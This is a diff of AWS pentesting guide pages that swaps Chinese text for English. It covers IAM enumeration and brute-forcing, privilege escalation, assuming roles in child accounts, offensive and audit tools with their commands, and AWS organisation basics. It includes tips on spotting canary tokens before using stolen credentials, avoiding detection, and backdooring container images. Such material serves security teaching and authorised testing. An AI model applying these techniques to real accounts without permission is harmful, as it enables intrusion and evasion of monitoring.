> 更多信息请 [**查看此页面**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass)
> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\
> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
### Org Enumeration
@@ -100,30 +102,30 @@ aws-services/aws-organizations-enum.md
### IAM Enumeration
如果您拥有足够的权限,**检查 AWS 账户内每个实体的权限** 将帮助您了解您和其他身份可以做什么,以及如何 **提升权限**
If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**.
如果您没有足够的权限来枚举 IAM您可以 **通过暴力破解来获取它们**\
请查看 **如何进行枚举和暴力破解**
If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\
Check **how to do the numeration and brute-forcing** in:
{{#ref}}
aws-services/aws-iam-enum.md
{{#endref}}
> [!NOTE]
> 现在您 **已经获得了一些关于您凭据的信息**(如果您是红队,希望您 **没有被检测到**)。是时候找出环境中正在使用哪些服务了。\
> 在接下来的部分中,您可以查看一些 **枚举常见服务** 的方法。
> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
> In the following section you can check some ways to **enumerate some common services.**
## Services Enumeration, Post-Exploitation & Persistence
AWS 拥有惊人的服务数量,在以下页面中,您将找到 **基本信息、枚举** 备忘单\*\*\*\* 如何 **避免检测**,获取 **持久性**,以及其他关于其中一些服务的 **后期利用** 技巧:
AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
{{#ref}}
aws-services/
{{#endref}}
请注意,您 **不** 需要 **手动** 执行所有工作,下面的帖子中您可以找到关于 [**自动工具**](#automated-tools)**部分**
Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](#automated-tools).
此外,在此阶段,您可能会发现 **更多暴露给未认证用户的服务**,您可能能够利用它们:
Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them:
{{#ref}}
aws-unauthenticated-enum-access/
@@ -131,7 +133,7 @@ aws-unauthenticated-enum-access/
## Privilege Escalation
如果您可以 **检查至少自己的权限** 在不同资源上,您可以 **检查是否能够获得更多权限**。您应该至少关注以下权限:
If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in:
{{#ref}}
aws-privilege-escalation/
@@ -139,10 +141,10 @@ aws-privilege-escalation/
## Publicly Exposed Services
在枚举 AWS 服务时,您可能发现其中一些 **向互联网暴露元素**(虚拟机/容器端口、数据库或队列服务、快照或存储桶...)。\
作为渗透测试者/红队成员,您应该始终检查是否可以在它们上找到 **敏感信息/漏洞**,因为它们可能为您提供 **进一步访问 AWS 账户** 的机会。
While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\
As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**.
在本书中,您应该找到关于如何查找 **暴露的 AWS 服务以及如何检查它们****信息**。关于如何查找 **暴露网络服务中的漏洞**,我建议您 **搜索** 特定的 **服务**
In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
{{#ref}}
https://book.hacktricks.wiki/
@@ -152,49 +154,52 @@ https://book.hacktricks.wiki/
### From the root/management account
当管理账户在组织中创建新账户时,会在新账户中创建一个 **新角色**,默认命名为 **`OrganizationAccountAccessRole`**,并给予 **AdministratorAccess** 策略以便管理账户访问新账户。
When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account.
<figure><img src="../../images/image (171).png" alt=""><figcaption></figcaption></figure>
因此,要以管理员身份访问子账户,您需要:
So, in order to access as administrator a child account you need:
- **攻陷** **管理** 账户并找到 **子账户的 ID****角色的名称**(默认是 OrganizationAccountAccessRole以允许管理账户以管理员身份访问。
- 要查找子账户,请转到 AWS 控制台中的组织部分或运行 `aws organizations list-accounts`
- 您无法直接找到角色的名称,因此请检查所有自定义 IAM 策略,并搜索任何允许 **`sts:AssumeRole` 的策略,针对之前发现的子账户**
- **攻陷** 管理账户中的 **主体**,并具有 **`sts:AssumeRole` 权限,针对子账户中的角色**(即使该账户允许管理账户中的任何人进行冒充,由于这是外部账户,特定的 `sts:AssumeRole` 权限是必要的)。
- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin.
- To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts`
- You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**.
- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary).
## Automated Tools
### Recon
- [**aws-recon**](https://github.com/darkbitio/aws-recon): 一个多线程的 AWS 安全专注的 **库存收集工具**,用 Ruby 编写。
- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby.
```bash
# Install
gem install aws_recon
# Recon and get json
AWS_PROFILE=<profile> aws_recon \
--services S3,EC2 \
--regions global,us-east-1,us-east-2 \
--verbose
--services S3,EC2 \
--regions global,us-east-1,us-east-2 \
--verbose
```
- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist 是一个 **多云工具,用于获取资产**主机名IP 地址)来自云服务提供商。
- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper 帮助您分析您的亚马逊网络服务AWS环境。它现在包含更多功能包括安全问题的审计。
- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues.
```bash
# Installation steps in github
# Create a config.json file with the aws info, like:
{
"accounts": [
{
"default": true,
"id": "<account id>",
"name": "dev"
}
],
"cidrs":
{
"2.2.2.2/28": {"name": "NY Office"}
}
"accounts": [
{
"default": true,
"id": "<account id>",
"name": "dev"
}
],
"cidrs":
{
"2.2.2.2/28": {"name": "NY Office"}
}
}
# Enumerate
@@ -224,7 +229,9 @@ python3 cloudmapper.py public --accounts dev
python cloudmapper.py prepare #Prepare webserver
python cloudmapper.py webserver #Show webserver
```
- [**cartography**](https://github.com/lyft/cartography): Cartography 是一个 Python 工具,它将基础设施资产及其之间的关系整合在一个由 Neo4j 数据库驱动的直观图形视图中。
- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
```bash
# Install
pip install cartography
@@ -233,15 +240,17 @@ pip install cartography
# Get AWS info
AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j
```
- [**starbase**](https://github.com/JupiterOne/starbase): Starbase 收集来自服务和系统的资产和关系包括云基础设施、SaaS 应用程序、安全控制等,形成一个直观的图形视图,支持 Neo4j 数据库。
- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (使用 python2) 这是一个尝试 **发现所有** [**AWS 资源**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) 的工具,这些资源是在一个账户中创建的。
- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): 这是一个 **获取所有公共 IP 地址**(包括 IPv4/IPv6与 AWS 账户关联的工具。
- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account.
- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account.
### Privesc & Exploiting
- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** 发现扫描的 AWS 环境中最特权的用户,包括 AWS Shadow Admins。它使用 powershell。您可以在 [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1) 中的函数 **`Check-PrivilegedPolicy`** 找到 **特权策略的定义**
- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu 是一个开源的 **AWS 利用框架**,旨在针对云环境进行攻击性安全测试。它可以 **枚举**、查找 **错误配置** **利用** 它们。您可以在 **`user_escalation_methods`** 字典中找到 [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) 中的 **特权权限的定义**
- 请注意pacu **仅检查您自己的 privescs 路径**(而不是账户范围内)。
- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict.
- Note that pacu **only checks your own privescs paths** (not account wide).
```bash
# Install
## Feel free to use venvs
@@ -255,7 +264,9 @@ pacu
> exec iam__enum_permissions # Get permissions
> exec iam__privesc_scan # List privileged permissions
```
- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) 是一个脚本和库,用于识别 AWS 账户或 AWS 组织中 AWS 身份和访问管理 (IAM) 配置的风险。它将账户中的不同 IAM 用户和角色建模为有向图,从而能够检查 **权限提升** 和攻击者可能采取的获取 AWS 中资源或操作的替代路径。您可以在 [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) 中检查以 `_edges.py` 结尾的文件名中使用的 **权限以查找 privesc** 路径。
- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
```bash
# Install
pip install principalmapper
@@ -277,8 +288,10 @@ pmapper --profile dev query 'preset privesc *' # Get privescs with admins
pmapper --profile dev orgs create
pmapper --profile dev orgs display
```
- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining 是一个 AWS IAM 安全评估工具,识别最小权限的违规行为并生成风险优先级的 HTML 报告。\
它将向您显示潜在的 **过度权限** 客户、内联和 AWS **策略** 以及哪些 **主体可以访问它们**。 (它不仅检查权限提升,还检查其他有趣的权限,建议使用)。
- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\
It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use).
```bash
# Install
pip install cloudsplaining
@@ -290,20 +303,24 @@ cloudsplaining download --profile dev
# Analyze the IAM policies
cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/
```
- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack 评估 AWS 账户的 **子域劫持漏洞**,这是由于 Route53 和 CloudFront 配置的解耦造成的。
- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): 列出 ECR 仓库 -> 拉取 ECR 仓库 -> 后门化 -> 推送后门镜像
- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag 是一个工具,**搜索**公共弹性块存储 (**EBS**) 快照中的秘密,这些秘密可能被意外遗留。
### 审计
- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations.
- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in.
### Audit
- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins).
- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit 由 Aqua 提供,是一个开源项目,旨在检测云基础设施账户中的 **安全风险**,包括:亚马逊网络服务 (AWS)、微软 Azure、谷歌云平台 (GCP)、甲骨文云基础设施 (OCI) 和 GitHub它不查找 ShadowAdmins
```bash
./index.js --csv=file.csv --console=table --config ./config.js
# Compiance options: --compliance {hipaa,cis,cis1,cis2,pci}
## use "cis" for cis level 1 and 2
```
- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler 是一个开源安全工具,用于执行 AWS 安全最佳实践评估、审计、事件响应、持续监控、加固和取证准备。
- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
```bash
# Install python3, jq and git
# Install
@@ -314,11 +331,15 @@ prowler -v
prowler <provider>
prowler aws --profile custom-profile [-M csv json json-asff html]
```
- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox 帮助您在不熟悉的云环境中获得情境意识。它是一个开源命令行工具,旨在帮助渗透测试人员和其他攻击性安全专业人员在云基础设施中找到可利用的攻击路径。
- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. Its an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
```bash
cloudfox aws --profile [profile-name] all-checks
```
- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite 是一个开源的多云安全审计工具,能够评估云环境的安全态势。
- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
```bash
# Install
virtualenv -p python3 venv
@@ -329,16 +350,18 @@ scout --help
# Get info
scout aws -p dev
```
- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): 云安全套件 (使用 python2.7,似乎未维护)
- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus 是一个强大的工具,用于 AWS EC2 / S3 / CloudTrail / CloudWatch / KMS 最佳加固实践 (似乎未维护)。它仅检查系统内默认配置的凭据。
### 持续审计
- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained)
- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system.
- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian 是一个用于管理公共云账户和资源的规则引擎。它允许用户 **定义政策以启用良好管理的云基础设施**,既安全又成本优化。它将组织中许多临时脚本整合为一个轻量级和灵活的工具,具有统一的指标和报告。
- [**pacbot**](https://github.com/tmobile/pacbot)**: 代码政策机器人 (PacBot)** 是一个用于 **持续合规监控、合规报告和云安全自动化** 的平台。在 PacBot 中安全和合规政策以代码形式实现。PacBot 发现的所有资源都根据这些政策进行评估以衡量政策符合性。PacBot **自动修复** 框架提供了通过采取预定义措施自动响应政策违规的能力。
- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert 是一个无服务器的 **实时** 数据分析框架,使您能够 **摄取、分析和警报** 来自任何环境的数据,**使用您定义的数据源和警报逻辑**。计算机安全团队使用 StreamAlert 每天扫描数 TB 的日志数据以进行事件检测和响应。
### Constant Audit
- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions.
- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response.
## DEBUG: Capture AWS cli requests
## DEBUG: 捕获 AWS cli 请求
```bash
# Set proxy
export HTTP_PROXY=http://localhost:8080
@@ -357,9 +380,14 @@ export AWS_CA_BUNDLE=~/Downloads/certificate.pem
# Run aws cli normally trusting burp cert
aws ...
```
## 参考
## References
- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
- [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,337 +1,351 @@
# AWS - 基本信息
# AWS - Basic Information
{{#include ../../../banners/hacktricks-training.md}}
## 组织层级
## Organization Hierarchy
![](<../../../images/image (151).png>)
### 账户
### Accounts
AWS 中,有一个 **根账户**,它是您 **组织中所有账户的父容器**。然而,您不需要使用该账户来部署资源,您可以创建 **其他账户以将不同的 AWS** 基础设施分开。
In AWS, there is a **root account**, which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them.
**安全** 的角度来看,这非常有趣,因为 **一个账户无法访问其他账户的资源**(除非专门创建了桥接),因此您可以在部署之间创建边界。
This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments.
因此,在一个组织中有 **两种类型的账户**(我们讨论的是 AWS 账户,而不是用户账户):一个被指定为管理账户的单一账户,以及一个或多个成员账户。
Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts.
- **管理账户(根账户)** 是您用来创建组织的账户。从组织的管理账户,您可以执行以下操作:
- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following:
- 在组织中创建账户
- 邀请其他现有账户加入组织
- 从组织中移除账户
- 管理邀请
- 对组织内的实体根、OU 或账户)应用政策
- 启用与支持的 AWS 服务的集成,以在组织中的所有账户之间提供服务功能。
- 可以使用创建此根账户/组织时使用的电子邮件和密码作为根用户登录。
- Create accounts in the organization
- Invite other existing accounts to the organization
- Remove accounts from the organization
- Manage invitations
- Apply policies to entities (roots, OUs, or accounts) within the organization
- Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization.
- It's possible to login as the root user using the email and password used to create this root account/organization.
管理账户具有 **付款账户的责任**,并负责支付所有成员账户产生的费用。您无法更改组织的管理账户。
The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account.
- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account.
- Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it).
- **成员账户** 组成了组织中所有其他账户。一个账户一次只能是一个组织的成员。您可以将政策附加到一个账户,以仅对该账户应用控制。
- 成员账户 **必须使用有效的电子邮件地址**,并可以有一个 **名称**,通常他们将无法管理账单(但可能会被授予访问权限)。
```
aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com
```
### **组织单位**
账户可以被分组为 **组织单位 (OU)**。通过这种方式,您可以为组织单位创建 **策略**,这些策略将 **应用于所有子账户**。请注意,一个 OU 可以有其他 OU 作为子单位。
### **Organization Units**
Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children.
```bash
# You can get the root id from aws organizations list-roots
aws organizations create-organizational-unit --parent-id r-lalala --name TestOU
```
### Service Control Policy (SCP)
一个 **service control policy (SCP)** 是一种政策,指定用户和角色在受 SCP 影响的账户中可以使用的服务和操作。SCP 与 **IAM** 权限政策 **类似**,但它们 **不授予任何权限**。相反SCP 指定了组织、组织单位 (OU) 或账户的 **最大权限**。当您将 SCP 附加到您的组织根或 OU 时,**SCP 限制成员账户中实体的权限**。
A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**.
这是 **即使是根用户也可以被阻止** 执行某些操作的唯一方法。例如,它可以用于阻止用户禁用 CloudTrail 或删除备份。\
绕过此限制的唯一方法是同时妥协配置 SCP 的 **主账户**(主账户无法被阻止)。
This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\
The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked).
> [!WARNING]
> 请注意,**SCP 仅限制账户中的主体**,因此其他账户不受影响。这意味着拥有一个 SCP 拒绝 `s3:GetObject` 不会阻止人们 **访问您账户中的公共 S3 存储桶**。
> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account.
SCP 示例:
SCP examples:
- 完全拒绝根账户
- 仅允许特定区域
- 仅允许白名单服务
- 拒绝禁用 GuardDutyCloudTrail 和 S3 公共阻止访问
- Deny the root account entirely
- Only allow specific regions
- Only allow white-listed services
- Deny GuardDuty, CloudTrail, and S3 Public Block Access from
- 拒绝安全/事件响应角色被删除或
being disabled
修改。
- Deny security/incident response roles from being deleted or
- 拒绝备份被删除。
- 拒绝创建 IAM 用户和访问密钥
modified.
在 [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) 中查找 **JSON 示例**
- Deny backups from being deleted.
- Deny creating IAM users and access keys
Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
### Resource Control Policy (RCP)
一个 **resource control policy (RCP)** 是一种政策,定义了 **您 AWS 组织内资源的最大权限**RCP 在语法上与 IAM 政策类似,但 **不授予权限**——它们仅限制其他政策可以应用于资源的权限。当您将 RCP 附加到您的组织根、组织单位 (OU) 或账户时RCP 限制受影响范围内所有资源的资源权限。
A **resource control policy (RCP)** is a policy that defines the **maximum permissions for resources within your AWS organization**. RCPs are similar to IAM policies in syntax but **dont grant permissions**—they only cap the permissions that can be applied to resources by other policies. When you attach an RCP to your organization root, an organizational unit (OU), or an account, the RCP limits resource permissions across all resources in the affected scope.
这是确保 **资源不能超过预定义访问级别** 的唯一方法——即使身份基础或资源基础政策过于宽松。绕过这些限制的唯一方法是同时修改由您组织的管理账户配置的 RCP。
This is the ONLY way to ensure that **resources cannot exceed predefined access levels**—even if an identity-based or resource-based policy is too permissive. The only way to bypass these limits is to also modify the RCP configured by your organizations management account.
> [!WARNING]
> RCP 仅限制资源可以拥有的权限。它们不直接控制主体可以做什么。例如,如果 RCP 拒绝对 S3 存储桶的外部访问,它确保存储桶的权限永远不会允许超出设定限制的操作——即使资源基础政策配置错误。
> RCPs only restrict the permissions that resources can have. They dont directly control what principals can do. For example, if an RCP denies external access to an S3 bucket, it ensures that the buckets permissions never allow actions beyond the set limit—even if a resource-based policy is misconfigured.
RCP 示例:
RCP examples:
- 限制 S3 存储桶,使其只能被您组织内的主体访问
- 限制 KMS 密钥使用,仅允许来自受信任组织账户的操作
- 限制 SQS 队列的权限,以防止未经授权的修改
- 在 Secrets Manager 秘密上强制访问边界,以保护敏感数据
- Restrict S3 buckets so they can only be accessed by principals within your organization
- Limit KMS key usage to only allow operations from trusted organizational accounts
- Cap permissions on SQS queues to prevent unauthorized modifications
- Enforce access boundaries on Secrets Manager secrets to protect sensitive data
[AWS Organizations Resource Control Policies documentation](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_rcps.html) 中查找示例。
Find examples in [AWS Organizations Resource Control Policies documentation](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_rcps.html)
### ARN
**Amazon Resource Name** 是每个 AWS 内部资源的 **唯一名称**,其组成如下:
**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this:
```
arn:partition:service:region:account-id:resource-type/resource-id
arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env
```
注意AWS中有4个分区但只有3种调用方式
Note that there are 4 partitions in AWS but only 3 ways to call them:
- AWS Standard: `aws`
- AWS China: `aws-cn`
- AWS US public Internet (GovCloud): `aws-us-gov`
- AWS Secret (US Classified): `aws`
## IAM - 身份和访问管理
## IAM - Identity and Access Management
IAM是允许您管理**身份验证**、**授权**和**访问控制**的服务。
IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
- **身份验证** - 定义身份和验证该身份的过程。此过程可以细分为:识别和验证。
- **授权** - 确定身份在系统中经过身份验证后可以访问的内容。
- **访问控制** - 授予对安全资源访问的方式和过程。
- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
- **Access Control** - The method and process of how access is granted to a secure resource
IAM可以通过其管理、控制和治理身份对您AWS账户内资源的身份验证、授权和访问控制机制的能力来定义。
IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
### [AWS账户根用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) <a href="#id_root" id="id_root"></a>
### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) <a href="#id_root" id="id_root"></a>
当您首次创建Amazon Web Services (AWS)账户时,您将开始使用一个具有**对账户中所有**AWS服务和资源的**完全访问权限**的单一登录身份。这是AWS账户的_**根用户**_通过使用**您用于创建账户的电子邮件地址和密码**进行登录。
When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**.
请注意,新创建的**管理员用户**将具有**比根用户更少的权限**。
Note that a new **admin user** will have **less permissions that the root user**.
从安全的角度来看,建议创建其他用户并避免使用此用户。
From a security point of view, it's recommended to create other users and avoid using this one.
### [IAM用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) <a href="#id_iam-users" id="id_iam-users"></a>
### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) <a href="#id_iam-users" id="id_iam-users"></a>
IAM _用户_是您在AWS中创建的实体用于**代表使用它与AWS交互的人员或应用程序**。AWS中的用户由名称和凭据密码和最多两个访问密钥组成。
An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys).
当您创建IAM用户时您通过使其成为具有适当权限策略的**用户组的成员**(推荐)或**直接将策略附加**到用户来授予其**权限**。
When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user.
用户可以启用**MFA登录**控制台。启用MFA的用户的API令牌不受MFA保护。如果您想要**使用MFA限制用户的API密钥访问**您需要在策略中指明为了执行某些操作需要MFA示例[**在这里**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html))。
Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
#### CLI
- **访问密钥ID**20个随机的大写字母数字字符AKHDNAPO86BSHKDIRYT
